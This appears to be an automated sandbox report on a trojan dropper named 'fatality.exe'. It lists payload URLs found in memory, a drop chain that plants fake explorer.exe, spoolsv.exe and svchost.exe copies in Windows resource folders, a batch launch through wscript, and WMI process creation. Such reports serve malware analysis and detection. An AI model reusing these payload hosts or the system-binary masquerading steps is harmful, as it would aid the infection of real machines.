7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                                      Source: explorer.exe, 00000003.00000002.2940622995.0000000000629000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd01.googlecode.com/
                                      Source: explorer.exe, 00000003.00000002.2940622995.0000000000629000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd01.googlecode.com/files/tjcm.gif
                                      Source: explorer.exe, 00000003.00000002.2940622995.0000000000629000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd01.googlecode.com/files/tjcm.gif/k
                                      Source: explorer.exe, 00000003.00000002.2940622995.0000000000663000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd01.googlecode.com/files/tjcm.gif4
                                      Source: explorer.exe, 00000003.00000002.2940622995.0000000000663000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd01.googlecode.com/files/tjcm.gif?
                                      Source: explorer.exe, 00000003.00000002.2940622995.0000000000663000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd01.googlecode.com/files/tjcm.gifK
                                      Source: explorer.exe, 00000003.00000002.2940622995.0000000000663000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd01.googlecode.com/files/tjcm.gifX
                                      Source: explorer.exe, 00000003.00000002.2940622995.0000000000629000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd01.googlecode.com/files/tjcm.gifh3P
                                      Source: explorer.exe, 00000003.00000002.2940622995.0000000000663000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd01.googlecode.com/files/tjcm.gifmes
                                      Source: explorer.exe, 00000003.00000002.2940622995.0000000000663000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd01.googlecode.com/files/tjcm.gifr
                                      Source: explorer.exe, 00000003.00000002.2940622995.0000000000663000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd01.googlecode.com/files/tjcm.gify
                                      Source: explorer.exe, 00000003.00000002.2940622995.0000000000629000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd01.googlecode.com/googlecode.com/ER_PROFILE_STRING=DefaultHOMEDRIVE
                                      Source: explorer.exe, 00000003.00000002.2940622995.0000000000629000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd01.googlecode.com/googlecode.com/rentVersion
                                      Source: explorer.exe, 00000003.00000002.2940622995.0000000000629000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd02.googlecode.com/
                                      Source: explorer.exe, 00000003.00000002.2940622995.0000000000663000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2939694879.000000000019B000.00000004.00000010.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2940622995.0000000000629000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd02.googlecode.com/files/tjcm.gif
                                      Source: explorer.exe, 00000003.00000002.2940622995.0000000000663000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd02.googlecode.com/files/tjcm.gif5
                                      Source: explorer.exe, 00000003.00000002.2940622995.0000000000663000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd02.googlecode.com/files/tjcm.gifF
                                      Source: explorer.exe, 00000003.00000002.2940622995.0000000000663000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd02.googlecode.com/files/tjcm.gifjaqfwbriwnsrwrrkxnqbqxkx
                                      Source: explorer.exe, 00000003.00000002.2940622995.0000000000663000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd02.googlecode.com/files/tjcm.gifm
                                      Source: explorer.exe, 00000003.00000002.2940622995.0000000000617000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd02.googlecode.com/files/tjcm.gifm.exe
                                      Source: explorer.exe, 00000003.00000002.2940622995.0000000000663000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd02.googlecode.com/files/tjcm.gifmes
                                      Source: explorer.exe, 00000003.00000002.2940622995.0000000000663000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd02.googlecode.com/fileseZClXsFjAqFWBriWnSRWrRKXnqBqXkX
                                      Source: explorer.exe, 00000003.00000002.2940622995.0000000000629000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd02.googlecode.com/googlecode.com/
                                      Source: explorer.exe, 00000003.00000002.2940622995.0000000000629000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd02.googlecode.com/googlecode.com/4
                                      Source: explorer.exe, 00000003.00000002.2940622995.0000000000629000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd02.googlecode.com/r
                                      Source: explorer.exe, 00000003.00000002.2940622995.0000000000629000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd02.googlecode.com/soft
                                      Source: explorer.exe, 00000003.00000002.2940622995.0000000000629000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd02.googlecode.com/ultipart/x-mixed-replace
                                      Source: explorer.exe, 00000003.00000002.2940622995.0000000000629000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd03.googlecode.com/
                                      Source: explorer.exe, 00000003.00000002.2940622995.0000000000629000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd03.googlecode.com/=C:
                                      Source: explorer.exe, 00000003.00000002.2940622995.0000000000663000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd03.googlecode.com/files/tjcm.gif
                                      Source: explorer.exe, 00000003.00000002.2940622995.0000000000663000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd03.googlecode.com/files/tjcm.gif1
                                      Source: explorer.exe, 00000003.00000002.2940622995.0000000000663000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd03.googlecode.com/files/tjcm.gifB
                                      Source: explorer.exe, 00000003.00000002.2940622995.0000000000663000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd03.googlecode.com/files/tjcm.gifH
                                      Source: explorer.exe, 00000003.00000002.2940622995.0000000000663000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd03.googlecode.com/files/tjcm.gifW
                                      Source: explorer.exe, 00000003.00000002.2940622995.0000000000663000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd03.googlecode.com/files/tjcm.gifl
                                      Source: explorer.exe, 00000003.00000002.2940622995.0000000000663000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd03.googlecode.com/files/tjcm.gifn
                                      Source: explorer.exe, 00000003.00000002.2940622995.0000000000663000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd03.googlecode.com/files/tjcm.gif~
                                      Source: explorer.exe, 00000003.00000002.2940622995.0000000000629000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd03.googlecode.com/googlecode.com/
                                      Source: explorer.exe, 00000003.00000002.2940622995.0000000000629000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd03.googlecode.com/googlecode.com/Microsoft
                                      Source: containerReview.exe, 0000000D.00000002.1906268968.0000000003BB0000.00000004.00000800.00020000.00000000.sdmp, containerReview.exe, 0000000D.00000002.1906268968.0000000003438000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                                      Source: fatality.exe , 00000001.00000002.1726000000.000000000095B000.00000040.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.enigmaprotector.com/
                                      Source: fatality.exe , 00000001.00000002.1726000000.000000000095B000.00000040.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.enigmaprotector.com/openU
                                      Source: explorer.exe, 00000003.00000002.2940622995.0000000000663000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com

                                      System Summary

                                      barindex
                                      PE file has a writeable .text section
                                      Source: fatality.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      Source: icsys.icn.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      Source: explorer.exe.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      Source: spoolsv.exe.3.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      Source: svchost.exe.4.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      PE file has nameless sections
                                      Source: fatality.exe .0.drStatic PE information: section name:
                                      Source: fatality.exe .0.drStatic PE information: section name:
                                      Source: fatality.exe .0.drStatic PE information: section name:
                                      Source: fatality.exe .0.drStatic PE information: section name:
                                      Source: fatality.exe .0.drStatic PE information: section name:
                                      Source: fatality.exe .0.drStatic PE information: section name:
                                      Source: fatality.exe .0.drStatic PE information: section name:
                                      Windows Scripting host queries suspicious COM object (likely to drop second stage)
                                      Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exe Code function: 1_2_04936863 NtQueryInformationProcess,GetSystemInfo,1_2_04936863
                                      Source: C:\Users\user\Desktop\fatality.exeFile created: C:\Windows\Resources\Themes\icsys.icn.exeJump to behavior
                                      Source: C:\Windows\Resources\Themes\icsys.icn.exeFile created: c:\windows\resources\themes\explorer.exeJump to behavior
                                      Source: C:\Windows\Resources\Themes\icsys.icn.exeFile created: c:\windows\resources\themes\explorer.exeJump to behavior
                                      Source: C:\Windows\Resources\Themes\explorer.exeFile created: c:\windows\resources\spoolsv.exeJump to behavior
                                      Source: C:\Windows\Resources\Themes\explorer.exeFile created: c:\windows\resources\spoolsv.exeJump to behavior
                                      Source: C:\Windows\Resources\spoolsv.exeFile created: c:\windows\resources\svchost.exeJump to behavior
                                      Source: C:\Windows\Resources\spoolsv.exeFile created: c:\windows\resources\svchost.exeJump to behavior
                                      Source: C:\Windows\Resources\svchost.exeFile created: C:\Windows\Resources\Themes\tjcm.cmnJump to behavior
                                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\CSC8BED934F688E46C294B230B686E2243F.TMP
                                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\SecurityHealthSystray.exe
                                      Source: C:\Windows\Resources\Themes\icsys.icn.exeFile deleted: C:\Windows\Resources\Themes\explorer.exeJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exeCode function: 0_2_00412C100_2_00412C10
                                      Source: C:\Users\user\Desktop\fatality.exe Code function: 1_2_008E848E1_2_008E848E
                                      Source: C:\Users\user\Desktop\fatality.exe Code function: 1_2_008F40881_2_008F4088
                                      Source: C:\Users\user\Desktop\fatality.exe Code function: 1_2_008F00B71_2_008F00B7
                                      Source: C:\Users\user\Desktop\fatality.exe Code function: 1_2_008E40FE1_2_008E40FE
                                      Source: C:\Users\user\Desktop\fatality.exe Code function: 1_2_009051C91_2_009051C9
                                      Source: C:\Users\user\Desktop\fatality.exe Code function: 1_2_008F71531_2_008F7153
                                      Source: C:\Users\user\Desktop\fatality.exe Code function: 1_2_008F62CA1_2_008F62CA
                                      Source: C:\Users\user\Desktop\fatality.exe Code function: 1_2_008E32F71_2_008E32F7
                                      Source: C:\Users\user\Desktop\fatality.exe Code function: 1_2_008F43BF1_2_008F43BF
                                      Source: C:\Users\user\Desktop\fatality.exe Code function: 1_2_008EC4261_2_008EC426
                                      Source: C:\Users\user\Desktop\fatality.exe Code function: 1_2_0090D4401_2_0090D440
                                      Source: C:\Users\user\Desktop\fatality.exe Code function: 1_2_008EF4611_2_008EF461
                                      Source: C:\Users\user\Desktop\fatality.exe Code function: 1_2_008F77EF1_2_008F77EF
                                      Source: C:\Users\user\Desktop\fatality.exe Code function: 1_2_0090E8AF1_2_0090E8AF
                                      Source: C:\Users\user\Desktop\fatality.exe Code function: 1_2_008E286B1_2_008E286B
                                      Source: C:\Users\user\Desktop\fatality.exe Code function: 1_2_008EE9B71_2_008EE9B7
                                      Source: C:\Users\user\Desktop\fatality.exe Code function: 1_2_008F6CDC1_2_008F6CDC
                                      Source: C:\Users\user\Desktop\fatality.exe Code function: 1_2_008F3E0B1_2_008F3E0B
                                      Source: C:\Users\user\Desktop\fatality.exe Code function: 1_2_008EEFE21_2_008EEFE2
                                      Source: C:\Users\user\Desktop\fatality.exe Code function: 1_2_0493456D1_2_0493456D
                                      Source: C:\Windows\Resources\Themes\explorer.exeCode function: 8_2_00412C108_2_00412C10
                                      Source: C:\blockcomSession\containerReview.exeCode function: 13_2_00007FFD9BAA0D7C13_2_00007FFD9BAA0D7C
                                      Source: C:\blockcomSession\containerReview.exeCode function: 13_2_00007FFD9BEA8A9F13_2_00007FFD9BEA8A9F
                                      Source: C:\blockcomSession\containerReview.exeCode function: 13_2_00007FFD9BEAF62C13_2_00007FFD9BEAF62C
                                      Source: C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeCode function: 32_2_00007FFD9BAD0D7C32_2_00007FFD9BAD0D7C
                                      Source: C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeCode function: 34_2_00007FFD9BAC0D7C34_2_00007FFD9BAC0D7C
                                      Source: C:\blockcomSession\Idle.exeCode function: 36_2_00007FFD9BA90D7C36_2_00007FFD9BA90D7C
                                      Source: C:\blockcomSession\Idle.exeCode function: 37_2_00007FFD9BAB0D7C37_2_00007FFD9BAB0D7C
                                      Source: C:\blockcomSession\smss.exeCode function: 39_2_00007FFD9BAA0D7C39_2_00007FFD9BAA0D7C
                                      Source: C:\blockcomSession\smss.exeCode function: 39_2_00007FFD9BAB07AE39_2_00007FFD9BAB07AE
                                      Source: C:\blockcomSession\smss.exeCode function: 39_2_00007FFD9BAB0CFB39_2_00007FFD9BAB0CFB
                                      Source: C:\blockcomSession\smss.exeCode function: 39_2_00007FFD9BAB055639_2_00007FFD9BAB0556
                                      Source: C:\blockcomSession\smss.exeCode function: 41_2_00007FFD9BAC0D7C41_2_00007FFD9BAC0D7C
                                      Source: C:\blockcomSession\smss.exeCode function: 41_2_00007FFD9BAD07AE41_2_00007FFD9BAD07AE
                                      Source: C:\blockcomSession\smss.exeCode function: 41_2_00007FFD9BAD0CFB41_2_00007FFD9BAD0CFB
                                      Source: C:\blockcomSession\smss.exeCode function: 41_2_00007FFD9BAD055641_2_00007FFD9BAD0556
                                      Source: Joe Sandbox ViewDropped File: C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe C91375814E8A5BB71736CE61FA429BC7B98A2B7B2A254B9967C51F3FCCFACD52
                                      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe C91375814E8A5BB71736CE61FA429BC7B98A2B7B2A254B9967C51F3FCCFACD52
                                      Source: Joe Sandbox ViewDropped File: C:\Users\user\Desktop\FJTVnRjh.log DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                      Source: C:\Users\user\Desktop\fatality.exe Code function: String function: 0095F264 appears 47 times
                                      Source: C:\Users\user\Desktop\fatality.exe Code function: String function: 008FEB78 appears 35 times
                                      Source: C:\Users\user\Desktop\fatality.exe Code function: String function: 008FEC50 appears 53 times
                                      Source: ZKzjsAAu.log.13.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                      Source: SdSCeHzI.log.13.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                      Source: zRrwKlet.log.13.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                      Source: hEPrrPJe.log.13.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                      Source: XWvbHmEw.log.13.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                      Source: FJTVnRjh.log.13.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                      Source: fatality.exe, 00000000.00000003.1707132728.0000000000618000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs fatality.exe
                                      Source: fatality.exe, 00000000.00000003.1707314583.0000000000625000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs fatality.exe
                                      Source: fatality.exe, 00000000.00000002.1707870858.000000000041D000.00000080.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameTJprojMain.exe<?xml version="1.0" encoding="UTF-8" standalone="yes"?> vs fatality.exe
                                      Source: fatality.exeBinary or memory string: OriginalFilenameTJprojMain.exe<?xml version="1.0" encoding="UTF-8" standalone="yes"?> vs fatality.exe
                                      Source: fatality.exeBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs fatality.exe
                                      Source: fatality.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                      Source: containerReview.exe.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                      Source: DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe.13.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                      Source: DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe0.13.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                      Source: smss.exe.13.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                      Source: DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe1.13.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                      Source: Idle.exe.13.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                      Source: fatality.exe .0.drStatic PE information: Section: ZLIB complexity 0.997276135089686
                                      Source: fatality.exe .0.drStatic PE information: Section: ZLIB complexity 0.9945203993055556
                                      Source: fatality.exe .0.drStatic PE information: Section: cheat ZLIB complexity 0.9969160071699135
                                      Source: explorer.exe, explorer.exe, 00000008.00000000.1815639732.0000000000401000.00000080.00000001.01000000.0000000B.sdmp, explorer.exe, 0000000E.00000000.1826039246.0000000000401000.00000080.00000001.01000000.0000000B.sdmp, explorer.exe, 0000000E.00000002.1829239210.0000000000402000.00000080.00000001.01000000.0000000B.sdmp, fatality.exe, icsys.icn.exe.0.drBinary or memory string: A*\AF:\RFD\xNewCode\xNewPro\xT\trjFN\Project1.vbp
                                      Source: explorer.exe, 00000003.00000002.2940280055.000000000041B000.00000004.00000001.01000000.0000000B.sdmpBinary or memory string: lH@*\AF:\RFD\xNewCode\xNewPro\xT\trjFN\Project1.vbp
                                      Source: fatality.exe, 00000000.00000002.1707711047.000000000041B000.00000004.00000001.01000000.00000003.sdmp, icsys.icn.exe, 00000002.00000002.1733290876.000000000041B000.00000004.00000001.01000000.00000008.sdmp, spoolsv.exe, 00000004.00000002.1726389745.000000000041B000.00000004.00000001.01000000.0000000C.sdmp, spoolsv.exe, 00000007.00000002.1726160837.000000000041B000.00000004.00000001.01000000.0000000C.sdmp, explorer.exe, 0000000E.00000002.1829396733.000000000041B000.00000004.00000001.01000000.0000000B.sdmpBinary or memory string: llH@*\AF:\RFD\xNewCode\xNewPro\xT\trjFN\Project1.vbp
                                      Source: classification engineClassification label: mal100.spre.troj.expl.evad.winEXE@56/42@3/3
                                      Source: C:\Users\user\Desktop\fatality.exeCode function: 0_2_00410180 __vbaChkstk,__vbaStrCopy,__vbaAryConstruct2,__vbaOnError,CreateToolhelp32Snapshot,__vbaSetSystemError,__vbaRecUniToAnsi,Process32First,__vbaSetSystemError,__vbaRecAnsiToUni,#525,__vbaStrMove,__vbaSetSystemError,__vbaGenerateBoundsError,__vbaStrToAnsi,K32GetModuleFileNameExA,__vbaSetSystemError,__vbaStrToUnicode,__vbaFreeStr,#616,__vbaStrMove,__vbaStrMove,__vbaFreeStr,__vbaLenBstr,__vbaStrCat,__vbaStrMove,__vbaStrCat,__vbaStrMove,__vbaInStr,__vbaFreeStrList,__vbaRecUniToAnsi,Process32Next,__vbaSetSystemError,__vbaRecAnsiToUni,CloseHandle,__vbaFreeStr,__vbaAryDestruct,__vbaFreeStr,__vbaFreeStr,0_2_00410180
                                      Source: C:\blockcomSession\containerReview.exeFile created: C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe
                                      Source: C:\Users\user\Desktop\fatality.exeFile created: c:\users\user\desktop\fatality.exe Jump to behavior
                                      Source: C:\blockcomSession\smss.exeMutant created: NULL
                                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7832:120:WilError_03
                                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8160:120:WilError_03
                                      Source: C:\blockcomSession\containerReview.exeMutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-KNZ6qT1z1KAE3Pr0GoKV
                                      Source: C:\Users\user\Desktop\fatality.exeFile created: C:\Users\user\AppData\Local\Temp\~DF7CFA9E15FE517528.TMPJump to behavior
                                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\blockcomSession\R3z0peym99fhJdrKbUwEGrQMoM2HpnSPGrE0X0k2hc.bat" "
                                      Source: C:\Windows\Resources\Themes\icsys.icn.exeProcess created: C:\Windows\Resources\Themes\explorer.exe
                                      Source: unknownProcess created: C:\Windows\Resources\Themes\explorer.exe
                                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\Resources\Themes\explorer.exe
                                      Source: C:\Windows\Resources\Themes\icsys.icn.exeProcess created: C:\Windows\Resources\Themes\explorer.exeJump to behavior
                                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\Resources\Themes\explorer.exe
                                      Source: C:\Users\user\Desktop\fatality.exe Command line argument: sfxname1_2_008FDF1E
                                      Source: C:\Users\user\Desktop\fatality.exe Command line argument: sfxstime1_2_008FDF1E
                                      Source: C:\Users\user\Desktop\fatality.exe Command line argument: STARTDLG1_2_008FDF1E
                                      Source: C:\Users\user\Desktop\fatality.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                                      Source: fatality.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                      Source: C:\blockcomSession\containerReview.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                      Source: C:\blockcomSession\containerReview.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                      Source: C:\blockcomSession\containerReview.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                      Source: C:\blockcomSession\containerReview.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                      Source: C:\blockcomSession\containerReview.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                      Source: C:\blockcomSession\containerReview.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                      Source: C:\blockcomSession\containerReview.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                      Source: C:\blockcomSession\containerReview.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                      Source: C:\blockcomSession\containerReview.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                      Source: C:\blockcomSession\containerReview.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                      Source: C:\blockcomSession\containerReview.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                      Source: C:\blockcomSession\containerReview.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                      Source: C:\blockcomSession\containerReview.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                      Source: C:\blockcomSession\containerReview.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                      Source: C:\blockcomSession\containerReview.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                      Source: C:\blockcomSession\containerReview.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                      Source: C:\blockcomSession\containerReview.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                      Source: C:\blockcomSession\containerReview.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                      Source: C:\Users\user\Desktop\fatality.exe File read: C:\Windows\win.iniJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                      Source: fatality.exeReversingLabs: Detection: 97%
                                      Source: fatality.exeString found in binary or memory: <Module>{B88D4D76-330A-4D76-ADDC-F680C30484D3}
                                      Source: C:\Users\user\Desktop\fatality.exeFile read: C:\Users\user\Desktop\fatality.exeJump to behavior
                                      Source: unknownProcess created: C:\Users\user\Desktop\fatality.exe "C:\Users\user\Desktop\fatality.exe"
                                      Source: C:\Users\user\Desktop\fatality.exeProcess created: C:\Users\user\Desktop\fatality.exe c:\users\user\desktop\fatality.exe
                                      Source: C:\Users\user\Desktop\fatality.exeProcess created: C:\Windows\Resources\Themes\icsys.icn.exe C:\Windows\Resources\Themes\icsys.icn.exe
                                      Source: C:\Windows\Resources\Themes\icsys.icn.exeProcess created: C:\Windows\Resources\Themes\explorer.exe c:\windows\resources\themes\explorer.exe
                                      Source: C:\Windows\Resources\Themes\explorer.exeProcess created: C:\Windows\Resources\spoolsv.exe c:\windows\resources\spoolsv.exe SE
